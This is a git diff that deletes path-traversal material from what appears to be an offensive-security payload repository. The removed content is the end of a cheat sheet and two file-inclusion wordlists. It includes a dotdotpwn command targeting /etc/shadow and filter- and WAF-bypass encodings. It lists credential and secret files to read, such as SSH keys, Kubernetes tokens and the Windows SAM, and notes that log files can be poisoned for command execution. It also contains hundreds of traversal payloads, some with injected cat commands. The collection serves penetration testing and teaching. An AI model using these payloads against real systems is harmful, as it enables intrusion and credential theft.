[dotdotpwn - https://github.com/wireghoul/dotdotpwn](https://github.com/wireghoul/dotdotpwn) - ```powershell - git clone https://github.com/wireghoul/dotdotpwn - perl dotdotpwn.pl -h 10.10.10.10 -m ftp -t 300 -f /etc/shadow -s -q -b - ``` - -## Basic exploitation - -We can use the `..` characters to access the parent directory, the following strings are several encoding that can help you bypass a poorly implemented filter. - -```powershell -../ -..\ -..\/ -%2e%2e%2f -%252e%252e%252f -%c0%ae%c0%ae%c0%af -%uff0e%uff0e%u2215 -%uff0e%uff0e%u2216 -``` - -### 16 bits Unicode encoding - -```powershell -. = %u002e -/ = %u2215 -\ = %u2216 -``` - -### UTF-8 Unicode encoding - -```powershell -. = %c0%2e, %e0%40%ae, %c0ae -/ = %c0%af, %e0%80%af, %c0%2f -\ = %c0%5c, %c0%80%5c -``` - -### Bypass "../" replaced by "" -Sometimes you encounter a WAF which remove the "../" characters from the strings, just duplicate them. - -```powershell -..././ -...\.\ -``` - -### Bypass "../" with ";" - -```powershell -..;/ -http://domain.tld/page.jsp?include=..;/..;/sensitive.txt -``` - -### Double URL encoding - -```powershell -. = %252e -/ = %252f -\ = %255c -``` - -**e.g:** Spring MVC Directory Traversal Vulnerability (CVE-2018-1271) with `http://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini` - -### UNC Bypass - -An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file. - -```powershell -\\localhost\c$\windows\win.ini -``` - -### NGINX/ALB Bypass - -NGINX in certain configurations and ALB can block traversal attacks in the route, For example: -```http://nginx-server/../../``` will return a 400 bad request. - -To bypass this behaviour just add forward slashes in front of the url: -```http://nginx-server////////../../``` - - -### Java Bypass - -Bypass Java's URL protocol - -```powershell -url:file:///etc/passwd -url:http://127.0.0.1:8080 -``` - - -## Path Traversal - -### Interesting Linux files - -```powershell -/etc/issue -/etc/passwd -/etc/shadow -/etc/group -/etc/hosts -/etc/motd -/etc/mysql/my.cnf -/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor) -/proc/self/environ -/proc/version -/proc/cmdline -/proc/sched_debug -/proc/mounts -/proc/net/arp -/proc/net/route -/proc/net/tcp -/proc/net/udp -/proc/self/cwd/index.php -/proc/self/cwd/main.py -/home/$USER/.bash_history -/home/$USER/.ssh/id_rsa -/run/secrets/kubernetes.io/serviceaccount/token -/run/secrets/kubernetes.io/serviceaccount/namespace -/run/secrets/kubernetes.io/serviceaccount/certificate -/var/run/secrets/kubernetes.io/serviceaccount -/var/lib/mlocate/mlocate.db -/var/lib/mlocate.db -``` - -### Interesting Windows files - -Always existing file in recent Windows machine. -Ideal to test path traversal but nothing much interesting inside... - -```powershell -c:\windows\system32\license.rtf -c:\windows\system32\eula.txt -``` - -Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread) - -```powershell -c:/boot.ini -c:/inetpub/logs/logfiles -c:/inetpub/wwwroot/global.asa -c:/inetpub/wwwroot/index.asp -c:/inetpub/wwwroot/web.config -c:/sysprep.inf -c:/sysprep.xml -c:/sysprep/sysprep.inf -c:/sysprep/sysprep.xml -c:/system32/inetsrv/metabase.xml -c:/sysprep.inf -c:/sysprep.xml -c:/sysprep/sysprep.inf -c:/sysprep/sysprep.xml -c:/system volume information/wpsettings.dat -c:/system32/inetsrv/metabase.xml -c:/unattend.txt -c:/unattend.xml -c:/unattended.txt -c:/unattended.xml -c:/windows/repair/sam -c:/windows/repair/system -``` - -The following log files are controllable and can be included with an evil payload to achieve a command execution - -```powershell -/var/log/apache/access.log -/var/log/apache/error.log -/var/log/httpd/error_log -/usr/local/apache/log/error_log -/usr/local/apache2/log/error_log -/var/log/nginx/access.log -/var/log/nginx/error.log -/var/log/vsftpd.log -/var/log/sshd.log -/var/log/mail -``` -## Labs - -* [File path traversal, simple case](https://portswigger.net/web-security/file-path-traversal/lab-simple) -* [File path traversal, traversal sequences blocked with absolute path bypass](https://portswigger.net/web-security/file-path-traversal/lab-absolute-path-bypass) -* [File path traversal, traversal sequences stripped non-recursively](https://portswigger.net/web-security/file-path-traversal/lab-sequences-stripped-non-recursively) -* [File path traversal, traversal sequences stripped with superfluous URL-decode](https://portswigger.net/web-security/file-path-traversal/lab-superfluous-url-decode) -* [File path traversal, validation of start of path](https://portswigger.net/web-security/file-path-traversal/lab-validate-start-of-path) -* [File path traversal, validation of file extension with null byte bypass](https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass) - -## References - -* [Path Traversal Cheat Sheet: Windows](https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/) -* [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack) -* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html) -* [NGINX may be protecting your applications from traversal attacks without you even knowing](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d?source=friends_link&sk=e9ddbadd61576f941be97e111e953381) -* [Directory traversal - Portswigger](https://portswigger.net/web-security/file-path-traversal) diff --git a/File Inclusion/Intruders/BSD-files.txt b/File Inclusion/Intruders/BSD-files.txt deleted file mode 100644 index 3f99f25..0000000 --- a/File Inclusion/Intruders/BSD-files.txt +++ /dev/null @@ -1,13 +0,0 @@ -/usr/pkg/etc/httpd/httpd.conf -/usr/local/etc/apache22/httpd.conf -/usr/local/etc/apache2/httpd.conf -/var/www/conf/httpd.conf -/var/www/logs/error_log -/var/www/logs/access_log -/etc/apache2/httpd2.conf -/var/apache2/logs/error_log -/var/apache2/logs/access_log -/var/log/httpd-error.log -/var/log/httpd-access.log -/var/log/httpd/error_log -/var/log/httpd/access_log \ No newline at end of file diff --git a/File Inclusion/Intruders/JHADDIX_LFI.txt b/File Inclusion/Intruders/JHADDIX_LFI.txt deleted file mode 100644 index 75b0632..0000000 --- a/File Inclusion/Intruders/JHADDIX_LFI.txt +++ /dev/null @@ -1,879 +0,0 @@ -/.../.../.../.../.../ -\…..\\\…..\\\…..\\\ -%00../../../../../../etc/passwd -%00/etc/passwd%00 -%00../../../../../../etc/shadow -%00/etc/shadow%00 -%0a/bin/cat%20/etc/passwd -%0a/bin/cat%20/etc/shadow -/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 -%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00 -%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 -%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini -/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini -/../../../../../../../../%2A -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow -..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd -..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow -..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed -..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd -..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow -=3D “/..” . “%2f.. -..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini -admin/access_log -/admin/install.php -../../../administrator/inbox -/apache2/logs/access_log -/apache2/logs/access.log -/apache2/logs/error_log -/apache2/logs/error.log -/apache/logs/access_log -/apache/logs/access.log -../../../../../apache/logs/access.log -../../../../apache/logs/access.log -../../../apache/logs/access.log -../../apache/logs/access.log -../apache/logs/access.log -/apache/logs/error_log -/apache/logs/error.log -../../../../../apache/logs/error.log -../../../../apache/logs/error.log -../../../apache/logs/error.log -../../apache/logs/error.log -../apache/logs/error.log -/apache\php\php.ini -\\'/bin/cat%20/etc/passwd\\' -\\'/bin/cat%20/etc/shadow\\' -/.bash_history -/.bash_profile -/.bashrc -/../../../../../../../../bin/id| -/bin/php.ini -/boot/grub/grub.conf -/./././././././././././boot.ini -/../../../../../../../../../../../boot.ini -/..\../..\../..\../..\../..\../..\../boot.ini -/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini -..//..//..//..//..//boot.ini -../../../../../../../../../../../../boot.ini -../../boot.ini -..\../..\../..\../..\../boot.ini -..\../..\../boot.ini -..\..\..\..\..\..\..\..\..\..\boot.ini -\..\..\..\..\..\..\..\..\..\..\boot.ini -/../../../../../../../../../../../boot.ini%00 -../../../../../../../../../../../../boot.ini%00 -..\..\..\..\..\..\..\..\..\..\boot.ini%00 -/../../../../../../../../../../../boot.ini%00.html -/../../../../../../../../../../../boot.ini%00.jpg -/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd -..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini -/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd -/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow -c:\apache\logs\access.log -c:\apache\logs\error.log -c:\AppServ\MySQL -C:/boot.ini -C:\boot.ini -/C:/inetpub/ftproot/ -C:/inetpub/wwwroot/global.asa -C:\inetpub\wwwroot\global.asa -c:\inetpub\wwwroot\index.asp -/config.asp -../config.asp -config.asp -../config.inc.php -config.inc.php -../config.js -config.js -_config.php -../_config.php -../config.php -config.php -../_config.php%00 -../../../../../../../../conf/server.xml -/core/config.php -/C:\Program Files\ -c:\Program Files\Apache Group\Apache\logs\access.log -c:\Program Files\Apache Group\Apache\logs\error.log -/.cshrc -c:\System32\Inetsrv\metabase.xml -c:WINDOWS/system32/ -d:\AppServ\MySQL -database.asp -database.js -database.php -data.php -dbase.php a -db.php -../../../../../../../dev -/D:\Program Files\ -d:\System32\Inetsrv\metabase.xml -/etc/apache2/apache2.conf -/etc/apache2/conf/httpd.conf -/etc/apache2/httpd.conf -/etc/apache2/sites-available/default -/etc/apache2/vhosts.d/default_vhost.include -/etc/apache/apache.conf -/etc/apache/conf/httpd.conf -/etc/apache/httpd.conf -/etc/apt/sources.list -/etc/chrootUsers -/etc/crontab -/etc/defaultdomain -/etc/default/passwd -/etc/defaultrouter -/etc/fstab -/etc/ftpchroot -/etc/ftphosts -/etc/group -/etc/hostname.bge -/etc/hostname.ce0 -/etc/hostname.ce1 -/etc/hostname.ce2 -/etc/hostname.ce3 -/etc/hostname.dcelx0 -/etc/hostname.dcelx1 -/etc/hostname.dcelx2 -/etc/hostname.dcelx3 -/etc/hostname.dmfe0 -/etc/hostname.dmfe1 -/etc/hostname.dmfe2 -/etc/hostname.dmfe3 -/etc/hostname.dnet0 -/etc/hostname.dnet1 -/etc/hostname.dnet2 -/etc/hostname.dnet3 -/etc/hostname.ecn0 -/etc/hostname.ecn1 -/etc/hostname.ecn2 -/etc/hostname.ecn3 -/etc/hostname.elx0 -/etc/hostname.elx1 -/etc/hostname.elx2 -/etc/hostname.elx3 -/etc/hostname.elxl0 -/etc/hostname.elxl1 -/etc/hostname.elxl2 -/etc/hostname.elxl3 -/etc/hostname.eri0 -/etc/hostname.eri1 -/etc/hostname.eri2 -/etc/hostname.eri3 -/etc/hostname.ge0 -/etc/hostname.ge1 -/etc/hostname.ge2 -/etc/hostname.ge3 -/etc/hostname.hme0 -/etc/hostname.hme1 -/etc/hostname.hme2 -/etc/hostname.hme3 -/etc/hostname.ieef0 -/etc/hostname.ieef1 -/etc/hostname.ieef2 -/etc/hostname.ieef3 -/etc/hostname.iprb0 -/etc/hostname.iprb1 -/etc/hostname.iprb2 -/etc/hostname.iprb3 -/etc/hostname.le0 -/etc/hostname.le1 -/etc/hostname.le2 -/etc/hostname.le3 -/etc/hostname.lo -/etc/hostname.pcn0 -/etc/hostname.pcn1 -/etc/hostname.pcn2 -/etc/hostname.pcn3 -/etc/hostname.qfe0 -/etc/hostname.qfe1 -/etc/hostname.qfe2 -/etc/hostname.qfe3 -/etc/hostname.spwr0 -/etc/hostname.spwr1 -/etc/hostname.spwr2 -/etc/hostname.spwr3 -/etc/hosts -../../../../../../../../../../../../etc/hosts -../../../../../../../../../../../../etc/hosts%00 -/etc/hosts.allow -/etc/hosts.deny -/etc/hosts.equiv -/etc/http/conf/httpd.conf -/etc/httpd.conf -/etc/httpd/conf.d/php.conf -/etc/httpd/conf.d/squirrelmail.conf -/etc/httpd/conf.d/ssl.conf -/etc/httpd/conf/httpd.conf -/etc/httpd/httpd.conf -/etc/httpd/logs/acces_log -/etc/httpd/logs/acces.log -../../../../../../../etc/httpd/logs/acces_log -../../../../../../../etc/httpd/logs/acces.log -/etc/httpd/logs/access_log -/etc/httpd/logs/access.log -../../../../../etc/httpd/logs/access_log -../../../../../etc/httpd/logs/access.log -/etc/httpd/logs/error_log -/etc/httpd/logs/error.log -../../../../../../../etc/httpd/logs/error_log -../../../../../../../etc/httpd/logs/error.log -../../../../../etc/httpd/logs/error_log -../../../../../etc/httpd/logs/error.log -/etc/httpd/php.ini -/etc/http/httpd.conf -/etc/inetd.conf -/etc/init.d/apache -/etc/init.d/apache2 -/etc/issue -/etc/logrotate.d/ftp -/etc/logrotate.d/httpd -/etc/logrotate.d/proftpd -/etc/logrotate.d/vsftpd.log -/etc/mail/access -/etc/mailman/mm_cfg.py -/etc/make.conf -/etc/master.passwd -/etc/motd -/etc/my.cnf -/etc/mysql/my.cnf -/etc/netconfig -/etc/nsswitch.conf -/etc/opt/ipf/ipf.conf -/etc/opt/ipf/ipnat.conf -/./././././././././././etc/passwd -/../../../../../../../../../../etc/passwd -/../../../../../../../../../../etc/passwd^^ -/..\../..\../..\../..\../..\../..\../etc/passwd -/etc/passwd -../../../../../../../../../../../../../../../../../../../../../../etc/passwd -../../../../../../../../../../../../../../../../../../../../../etc/passwd -../../../../../../../../../../../../../../../../../../../../etc/passwd -../../../../../../../../../../../../../../../../../../../etc/passwd -../../../../../../../../../../../../../../../../../../etc/passwd -../../../../../../../../../../../../../../../../../etc/passwd -../../../../../../../../../../../../../../../../etc/passwd -../../../../../../../../../../../../../../../etc/passwd -../../../../../../../../../../../../../../etc/passwd -../../../../../../../../../../../../../etc/passwd -../../../../../../../../../../../../etc/passwd -../../../../../../../../../../../etc/passwd -../../../../../../../../../../etc/passwd -../../../../../../../../../etc/passwd -../../../../../../../../etc/passwd -../../../../../../../etc/passwd -../../../../../../etc/passwd -../../../../../etc/passwd -../../../../etc/passwd -../../../etc/passwd -../../etc/passwd -../etc/passwd -..\..\..\..\..\..\..\..\..\..\etc\passwd -.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd -\..\..\..\..\..\..\..\..\..\..\etc\passwd -etc/passwd -/etc/passwd%00 -../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 -../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 -../../../../../../../../../../../../../../../../../../../../etc/passwd%00 -../../../../../../../../../../../../../../../../../../../etc/passwd%00 -../../../../../../../../../../../../../../../../../../etc/passwd%00 -../../../../../../../../../../../../../../../../../etc/passwd%00 -../../../../../../../../../../../../../../../../etc/passwd%00 -../../../../../../../../../../../../../../../etc/passwd%00 -../../../../../../../../../../../../../../etc/passwd%00 -../../../../../../../../../../../../../etc/passwd%00 -../../../../../../../../../../../../etc/passwd%00 -../../../../../../../../../../../etc/passwd%00 -../../../../../../../../../../etc/passwd%00 -../../../../../../../../../etc/passwd%00 -../../../../../../../../etc/passwd%00 -../../../../../../../etc/passwd%00 -../../../../../../etc/passwd%00 -../../../../../etc/passwd%00 -../../../../etc/passwd%00 -../../../etc/passwd%00 -../../etc/passwd%00 -../etc/passwd%00 -..\..\..\..\..\..\..\..\..\..\etc\passwd%00 -\..\..\..\..\..\..\..\..\..\..\etc\passwd%00 -/../../../../../../../../../../../etc/passwd%00.html -/../../../../../../../../../../../etc/passwd%00.jpg -../../../../../../etc/passwd&=%3C%3C%3C%3C -/etc/php4.4/fcgi/php.ini -/etc/php4/apache2/php.ini -/etc/php4/apache/php.ini -/etc/php4/cgi/php.ini -/etc/php5/apache2/php.ini -/etc/php5/apache/php.ini -/etc/php5/cgi/php.ini -/etc/php/apache2/php.ini -/etc/php/apache/php.ini -/etc/php/cgi/php.ini -/etc/php.d/dom.ini -/etc/php.d/gd.ini -/etc/php.d/imap.ini -/etc/php.d/json.ini -/etc/php.d/ldap.ini -/etc/php.d/mbstring.ini -/etc/php.d/mysqli.ini -/etc/php.d/mysql.ini -/etc/php.d/odbc.ini -/etc/php.d/pdo.ini -/etc/php.d/pdo_mysql.ini -/etc/php.d/pdo_odbc.ini -/etc/php.d/pdo_pgsql.ini -/etc/php.d/pdo_sqlite.ini -/etc/php.d/pgsql.ini -/etc/php.d/xmlreader.ini -/etc/php.d/xmlwriter.ini -/etc/php.d/xsl.ini -/etc/php.d/zip.ini -/etc/php.ini -/etc/php/php4/php.ini -/etc/php/php.ini -/etc/postfix/mydomains -/etc/proftp.conf -/etc/proftpd/modules.conf -/etc/protpd/proftpd.conf -/etc/pure-ftpd.conf -/etc/pureftpd.passwd -/etc/pureftpd.pdb -/etc/pure-ftpd/pure-ftpd.conf -/etc/pure-ftpd/pure-ftpd.pdb -/etc/pure-ftpd/pureftpd.pdb -/etc/release -/etc/resolv.conf -/etc/rpc -/etc/security/environ -/etc/security/failedlogin -/etc/security/group -/etc/security/lastlog -/etc/security/limits -/etc/security/passwd -/etc/security/user -/./././././././././././etc/shadow -/../../../../../../../../../../etc/shadow -/../../../../../../../../../../etc/shadow^^ -/..\../..\../..\../..\../..\../..\../etc/shadow -/etc/shadow -../../../../../../../../../../../../etc/shadow -..\..\..\..\..\..\..\..\..\..\etc\shadow -.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow -\..\..\..\..\..\..\..\..\..\..\etc\shadow -../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00 -../../../../../../../../../../../../etc/shadow%00 -..\..\..\..\..\..\..\..\..\..\etc\shadow%00 -\..\..\..\..\..\..\..\..\..\..\etc\shadow%00 -etc/shadow%00 -/etc/ssh/sshd_config -/etc/sudoers -/etc/syslog.conf -/etc/syslogd.conf -/etc/system -/etc/updatedb.conf -/etc/utmp -/etc/vfstab -/etc/vhcs2/proftpd/proftpd.conf -/etc/vsftpd.chroot_list -/etc/vsftpd.conf -/etc/vsftpd/vsftpd.conf -/etc/wtmp -/etc/wu-ftpd/ftpaccess -/etc/wu-ftpd/ftphosts -/etc/wu-ftpd/ftpusers -/.forward -/home2\bin\stable\apache\php.ini -/home/apache/conf/httpd.conf -/home/apache/httpd.conf -/home\bin\stable\apache\php.ini -/.htpasswd -.htpasswd -../.htpasswd -../install.php -install.php -../../../../../../../../../../../../localstart.asp -../../../../../../../../../../../../localstart.asp%00 -/log/miscDir/accesslog -/.logout -/logs/access_log -/logs/access.log -../../../../../logs/access.log -../../../../logs/access.log -../../../logs/access.log -../../logs/access.log -../logs/access.log -/logs/error_log -/logs/error.log -../../../../../logs/error.log -../../../../logs/error.log -../../../logs/error.log -../../logs/error.log -../logs/error.log -/logs/pure-ftpd.log -/master.passwd -member/.htpasswd -members/.htpasswd -/.netrc -/NetServer\bin\stable\apache\php.ini -/opt/apache2/conf/httpd.conf -/opt/apache/conf/httpd.conf -/opt/lampp/logs/access_log -/opt/lampp/logs/access.log -/opt/lampp/logs/error_log -/opt/lampp/logs/error.log -/opt/xampp/etc/php.ini -/opt/xampp/logs/access_log -/opt/xampp/logs/access.log -/opt/xampp/logs/error_log -/opt/xampp/logs/error.log -.pass -../.pass -pass.dat -passwd -/.passwd -.passwd -../.passwd -passwd.dat -/php4\php.ini -/php5\php.ini -/php\php.ini -/PHP\php.ini -/private/etc/httpd/httpd.conf -/private/etc/httpd/httpd.conf.default -/proc/cpuinfo -/proc/interrupts -/proc/loadavg -/proc/meminfo -/proc/mounts -/proc/net/arp -/proc/net/dev -/proc/net/route -/proc/net/tcp -/proc/partitions -/proc/self/cmdline -/proc/self/envron -/proc/version -/.profile -/Program Files\Apache Group\Apache2\conf\httpd.conf -/Program Files\Apache Group\Apache\conf\httpd.conf -/Program Files\Apache Group\Apache\logs\access.log -/Program Files\Apache Group\Apache\logs\error.log -/Program Files\xampp\apache\conf\httpd.conf -/../../../../pswd -/.rhosts -/root/.bash_history -/root/.bash_logut -root/.htpasswd -/root/.ksh_history -/root/.Xauthority -/.sh_history -/.shosts -/.ssh/authorized_keys -user/.htpasswd -../users.db.php -users.db.php -users/.htpasswd -/usr/apache2/conf/httpd.conf -/usr/apache/conf/httpd.conf -/usr/etc/pure-ftpd.conf -/usr/lib/cron/log -/usr/lib/php.ini -/usr/lib/php/php.ini -/usr/lib/security/mkuser.default -/usr/local/apache2/conf/httpd.conf -/usr/local/apache2/httpd.conf -/usr/local/apache2/logs/access_log -/usr/local/apache2/logs/access.log -/usr/local/apache2/logs/error_log -/usr/local/apache2/logs/error.log -/usr/local/apache/conf/httpd.conf -/usr/local/apache/conf/php.ini -/usr/local/apache/httpd.conf -/usr/local/apache/log -/usr/local/apache/logs -/usr/local/apache/logs/access_log -/usr/local/apache/logs/access_ log -/usr/local/apache/logs/access.log -/usr/local/apache/logs/access. log -../../../../../../../usr/local/apache/logs/access_ log -../../../../../../../usr/local/apache/logs/access. log -../../../../../usr/local/apache/logs/access_log -../../../../../usr/local/apache/logs/access.log -/usr/local/apache/logs/error_log -/usr/local/apache/logs/error.log -../../../../../../../usr/local/apache/logs/error_l og -../../../../../../../usr/local/apache/logs/error.l og -../../../../../usr/local/apache/logs/error_log -../../../../../usr/local/apache/logs/error.log -/usr/local/apps/apache2/conf/httpd.conf -/usr/local/apps/apache/conf/httpd.conf -/usr/local/cpanel/logs -/usr/local/cpanel/logs/access_log -/usr/local/cpanel/logs/error_log -/usr/local/cpanel/logs/license_log -/usr/local/cpanel/logs/login_log -/usr/local/cpanel/logs/stats_log -/usr/local/etc/apache2/conf/httpd.conf -/usr/local/etc/apache/conf/httpd.conf -/usr/local/etc/apache/vhosts.conf -/usr/local/etc/httpd/conf/httpd.conf -/usr/local/etc/httpd/logs/access_log -/usr/local/etc/httpd/logs/error_log -/usr/local/etc/php.ini -/usr/local/etc/pure-ftpd.conf -/usr/local/etc/pureftpd.pdb -/usr/local/httpd/conf/httpd.conf -/usr/local/lib/php.ini -/usr/local/php4/httpd.conf -/usr/local/php4/httpd.conf.php -/usr/local/php4/lib/php.ini -/usr/local/php5/httpd.conf -/usr/local/php5/httpd.conf.php -/usr/local/php5/lib/php.ini -/usr/local/php/httpd.conf -/usr/local/php/httpd.conf.php -/usr/local/php/lib/php.ini -/usr/local/pureftpd/etc/pure-ftpd.conf -/usr/local/pureftpd/etc/pureftpd.pdb -/usr/local/pureftpd/sbin/pure-config.pl -/usr/local/www/logs/thttpd_log -/usr/local/Zend/etc/php.ini -/usr/pkgsrc/net/pureftpd/ -/usr/ports/contrib/pure-ftpd/ -/usr/ports/ftp/pure-ftpd/ -/usr/ports/net/pure-ftpd/ -/usr/sbin/pure-config.pl -/usr/spool/lp/log -/usr/spool/mqueue/syslog -/var/adm -/var/adm/acct/sum/loginlog -/var/adm/aculog -/var/adm/aculogs -/var/adm/crash/unix -/var/adm/crash/vmcore -/var/adm/cron/log -/var/adm/dtmp -/var/adm/lastlog -/var/adm/lastlog/username -/var/adm/log/asppp.log -/var/adm/loginlog -/var/adm/log/xferlog -/var/adm/lp/lpd-errs -/var/adm/messages -/var/adm/pacct -/var/adm/qacct -/var/adm/ras/bootlog -/var/adm/ras/errlog -/var/adm/sulog -/var/adm/SYSLOG -/var/adm/utmp -/var/adm/utmpx -/var/adm/vold.log -/var/adm/wtmp -/var/adm/wtmpx -/var/adm/X0msgs -/var/apache/log -/var/apache/logs -/var/apache/logs/access_log -/var/apache/logs/error_log -/var/cpanel/cpanel.config -/var/cron/log -/var/lib/mlocate/mlocate.db -/var/lib/mysql/my.cnf -/var/local/www/conf/php.ini -/var/lock/samba -/var/log -/var/log/access_log -/var/log/access.log -../../../../../../../var/log/access_log -../../../../../../../var/log/access.log -../../../../../var/log/access_log -/var/log/acct -/var/log/apache2/access_log -/var/log/apache2/access.log -../../../../../../../var/log/apache2/access_log -../../../../../../../var/log/apache2/access.log -/var/log/apache2/error_log -/var/log/apache2/error.log -../../../../../../../var/log/apache2/error_log -../../../../../../../var/log/apache2/error.log -/var/log/apache/access_log -/var/log/apache/access.log -../../../../../../../var/log/apache/access_log -../../../../../../../var/log/apache/access.log -../../../../../var/log/apache/access_log -../../../../../var/log/apache/access.log -/var/log/apache/error_log -/var/log/apache/error.log -../../../../../../../var/log/apache/error_log -../../../../../../../var/log/apache/error.log -../../../../../var/log/apache/error_log -../../../../../var/log/apache/error.log -/var/log/apache-ssl/access.log -/var/log/apache-ssl/error.log -/var/log/auth -/var/log/authlog -/var/log/auth.log -/var/log/boot.log -/var/log/cron.log -/var/log/dmesg -/var/log/error_log -/var/log/error.log -../../../../../../../var/log/error_log -../../../../../../../var/log/error.log -../../../../../var/log/error_log -/var/log/exim_mainlog -/var/log/exim/mainlog -/var/log/exim_paniclog -/var/log/exim/paniclog -/var/log/exim_rejectlog -/var/log/exim/rejectlog -/var/log/ftplog -/var/log/ftp-proxy -/var/log/ftp-proxy/ftp-proxy.log -/var/log/httpd/ -/var/log/httpd/access_log -/var/log/httpd/access.log -../../../../../var/log/httpd/access_log -/var/log/httpd/error_log -/var/log/httpd/error.log -../../../../../var/log/httpd/error_log -/var/log/httpsd/ssl.access_log -/var/log/httpsd/ssl_log -/var/log/kern.log -/var/log/lastlog -/var/log/lighttpd -/var/log/maillog -/var/log/message -/var/log/messages -/var/log/mysqlderror.log -/var/log/mysqld.log -/var/log/mysql.log -/var/log/mysql/mysql-bin.log -/var/log/mysql/mysql.log -/var/log/mysql/mysql-slow.log -/var/log/ncftpd.errs -/var/log/ncftpd/misclog.txt -/var/log/news -/var/log/news.all -/var/log/news/news -/var/log/news/news.all -/var/log/news/news.crit -/var/log/news/news.err -/var/log/news/news.notice -/var/log/news/suck.err -/var/log/news/suck.notice -/var/log/nginx/access_log -/var/log/nginx/access.log -../../../../../../../var/log/nginx/access_log -../../../../../../../var/log/nginx/access.log -../../../../../var/log/nginx/access_log -../../../../../var/log/nginx/access.log -/var/log/nginx/error_log -/var/log/nginx/error.log -../../../../../../../var/log/nginx/error_log -../../../../../../../var/log/nginx/error.log -../../../../../var/log/nginx/error_log -../../../../../var/log/nginx/error.log -/var/log/poplog -/var/log/POPlog -/var/log/proftpd -/var/log/proftpd.access_log -/var/log/proftpd.xferlog -/var/log/proftpd/xferlog.legacy -/var/log/pureftpd.log -/var/log/pure-ftpd/pure-ftpd.log -/var/log/qmail -/var/log/qmail/ -/var/log/samba -/var/log/samba-log.%m -/var/log/secure -/var/log/smtpd -/var/log/spooler -/var/log/syslog -/var/log/telnetd -/var/log/thttpd_log -/var/log/utmp -/var/log/vsftpd.log -/var/log/wtmp -/var/log/xferlog -/var/log/yum.log -/var/lp/logs/lpNet -/var/lp/logs/lpsched -/var/lp/logs/requests -/var/mysql.log -/var/run/httpd.pid -/var/run/mysqld/mysqld.pid -/var/run/utmp -/var/saf/_log -/var/saf/port/log -/var/spool/errors -/var/spool/locks -/var/spool/logs -/var/spool/tmp -/var/www/conf/httpd.conf -/var/www/html/.htaccess -/var/www/localhost/htdocs/.htaccess -/var/www/log/access_log -/var/www/log/error_log -/../../var/www/logs/access_log -/var/www/logs/access_log -/var/www/logs/access.log -../../../../../../../var/www/logs/access_log -../../../../../../../var/www/logs/access.log -../../../../../var/www/logs/access.log -/var/www/logs/error_log -/var/www/logs/error.log -../../../../../../../var/www/logs/error_log -../../../../../../../var/www/logs/error.log -../../../../../var/www/logs/error_log -../../../../../var/www/logs/error.log -/var/www/sitename/htdocs/ -/var/www/vhosts/sitename/httpdocs/.htaccess -/var/www/web1/html/.htaccess -/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf -/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf -/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf -/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php -/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php -/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php -/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini -/Volumes/webBackup/opt/apache2/conf/httpd.conf -/Volumes/webBackup/private/etc/httpd/httpd.conf -/Volumes/webBackup/private/etc/httpd/httpd.conf.default -/web/conf/php.ini -/WINDOWS\php.ini -../../windows/win.ini -/WINNT\php.ini -/..\..\..\..\..\..\winnt\win.ini -/www/logs/proftpd.system.log -/xampp\apache\bin\php.ini -/.Xauthority 